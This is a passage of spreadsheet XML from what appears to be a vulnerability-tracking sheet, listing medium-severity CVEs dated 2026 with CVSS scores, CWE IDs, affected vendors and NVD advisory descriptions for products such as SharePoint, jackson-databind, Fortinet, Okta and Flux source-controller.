      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Class and Exam Timetabling System 1.0. Affected by this vulnerability is the function mysqli_query of the file /admin/modal_add_room.php. The manipulation of the argument room_name leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="S442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86225</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86673</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function mysqli_connect of the file config/database.php of the component Database Connection. This manipulation causes hard-coded credentials. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69402</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K444" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr"/>
      <c r="Q444" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69417</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K445" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr"/>
      <c r="Q445" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69690</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K446" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr"/>
      <c r="Q446" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84385</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr"/>
      <c r="Q447" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R447"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S447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19032</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>36c7be3b-2937-45df-85ea-ca7133ea542c</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr">
        <is>
          <t>jackson-databind, fasterxml</t>
        </is>
      </c>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr"/>
      <c r="Q448" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-610</t>
        </is>
      </c>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>jackson-databind's deserializer for java.nio.file.Path resolves an attacker-supplied URI without restricting the URI scheme. In JDKFromStringDeserializer.NioPathHelper.deserialize, a string bound from untrusted JSON is passed to new URI(value) and then to Path.of(uri). When that throws FileSystemNotFoundException, the code enumerates ServiceLoader&lt;FileSystemProvider&gt; and calls provider.getPath(uri) on the first provider whose scheme matches the attacker-chosen scheme. Untrusted JSON can therefore select and drive an arbitrary registered FileSystemProvider during readValue under a default JsonMapper, and forces provider class loading at the same time. With only the JDK built-in providers (file, jar/zipfs) present, the resolved path is inert and no mount or network I/O occurs; further impact requires a side-effecting third-party FileSystemProvider on the classpath. This affects com.fasterxml.jackson.core:jackson-databind from 2.8.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2. Binding java.nio.file.Path from untrusted JSON should be avoided regardless of version.</t>
        </is>
      </c>
      <c r="S448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19032</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47680</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr"/>
      <c r="Q449" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>The source-controller is a Kubernetes operator, specialised in artifacts acquisition from external sources such as Git, OCI, Helm repositories and S3-compatible buckets. In versions 0.0.17 through 1.8.4, an actor with the ability to influence the contents of a bucket referenced by a `Bucket` resource can cause source-controller to write fetched object data to paths outside the per-reconciliation working directory. The corruption surface is bounded by source-controller's own and downstream Flux controllers' digest verification: source-controller verifies stored artifact digests during reconciliation and rebuilds on divergence; consumers (kustomize-controller, helm-controller) verify the digest of fetched artifacts and reject mismatches. These checks prevent a manipulated artifact from reaching the cluster, but an attacker can still write files anywhere the source-controller pod has permission to write. Separately, a user with permission to create or update `GitRepository` resources can cause source-controller to test for the existence of paths outside the cloned repository. Because the result is exposed via the resource's status, this allows limited enumeration of file paths on the controller pod. This surface exists only on source-controller v1.6.0 and later, where the sparse-checkout feature was introduced. This vulnerability was fixed in source-controller v1.8.5. There is no in-product workaround. Users should upgrade to a patched version. As a defense-in-depth measure for the GitRepository sparse-checkout surface, a `ValidatingAdmissionPolicy` (or a third-party policy engine such as Kyverno or OPA Gatekeeper) can be deployed to reject `GitRepository` resources whose `.spec.sparseCheckout` entries contain `..` or absolute path segments.</t>
        </is>
      </c>
      <c r="S449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56704</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr"/>
      <c r="Q450" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 inserts unsanitized database server version strings into script tags with valid CSP nonces without proper validation. Attackers controlling a rogue MySQL server can return crafted version strings that break out of the JavaScript context and execute arbitrary code, bypassing Content Security Policy protections.</t>
        </is>
      </c>
      <c r="S450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56704</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78446</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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51" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr"/>
      <c r="Q451" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78602</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>security@elastic.co</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K452" s="5" t="inlineStr">
        <is>
          <t>elastic:maps_server</t>
        </is>
      </c>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr"/>
      <c r="Q452" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22) in Elastic Maps Server can lead to information disclosure via Path Traversal (CAPEC-126). An unauthenticated attacker able to reach the service over the network could cause it to return the contents of files outside its intended content directory that are readable by the server process.</t>
        </is>
      </c>
      <c r="S452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78602</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78631</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr"/>
      <c r="Q453" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R453"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S453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84386</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr"/>
      <c r="Q454" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85781</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr"/>
      <c r="Q455" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>Unverified ownership of a storage access point in the volume deletion component of the Amazon EFS CSI Driver before v3.4.1 might allow an authenticated Kubernetes user with PersistentVolume creation privileges to cause recursive deletion of directories on an EFS filesystem they are not authorized to access, via a crafted PersistentVolume volumeHandle that pairs an access point from one filesystem with a different target filesystem.
To remediate this issue, users should upgrade to version v3.4.1.</t>
        </is>
      </c>
      <c r="S455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85781</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78635</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr"/>
      <c r="Q456" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R456"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S456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22575</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr"/>
      <c r="Q457" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability in Fortinet FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.10, FortiManager 7.2 all versions, FortiManager Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.4.1 through 7.4.10, FortiManager Cloud 7.2 all versions may allow an administrator to bypass the approval process for workflow sessions via crafted HTTP or HTTPs requests.</t>
        </is>
      </c>
      <c r="S457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68785</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K458" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr"/>
      <c r="Q458" s="5" t="inlineStr">
        <is>
